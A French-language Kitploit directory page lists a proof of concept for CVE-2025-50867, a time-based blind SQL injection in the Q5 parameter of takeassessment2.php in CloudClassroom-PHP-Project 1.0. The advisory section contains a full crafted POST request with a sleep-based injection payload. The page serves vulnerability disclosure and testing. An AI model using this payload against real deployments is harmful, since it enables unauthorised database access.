Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-50867 — Preuve de concept pour une vulnérabilité d'injection SQL aveugle basée sur le temps dans le point d'accès takeassessment2.php de CloudClassroom-PHP-Project 1.0, démontrant une exploitation à distance via une requête POST conçue. | Kitploit
Outils/GitHubGitHub/sacx-7/cve-2025-50867
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

Preuve de concept pour une vulnérabilité d'injection SQL aveugle basée sur le temps dans le point d'accès takeassessment2.php de CloudClassroom-PHP-Project 1.0, démontrant une exploitation à distance via une requête POST conçue.

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Une vulnérabilité d'injection SQL existe dans le point de terminaison takeassessment2.php de CloudClassroom-PHP-Project 1.0, où le paramètre POST Q5 est directement intégré dans des instructions SQL sans assainissement.


Type de vulnérabilité :

Injection SQL


Vendeur du produit :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


Base de code du produit affecté :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


Composant affecté :

takeassessment2.php, paramètre POST Q5, logique de requête SQL


Type d'attaque : À distance

Vecteurs d'attaque :

Pour exploiter cette vulnérabilité, un attaquant soumet une requête POST malveillante à /CloudClassroom-PHP-Project-master/takeassessment2.php avec une charge utile dans le paramètre Q5 qui provoque un délai temporel dans le traitement SQL (SQLi aveugle basée sur le temps).

Requête POST :

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Cela provoque un délai de 6 secondes dans la réponse, confirmant la vulnérabilité.


Référence :

https://owasp.org/www-community/attacks/SQL_Injection


Découvreur : saurabh solanki

LinkedIn : https://www.linkedin.com/in/saurabh-b294b21aa/

Télécharger l’outil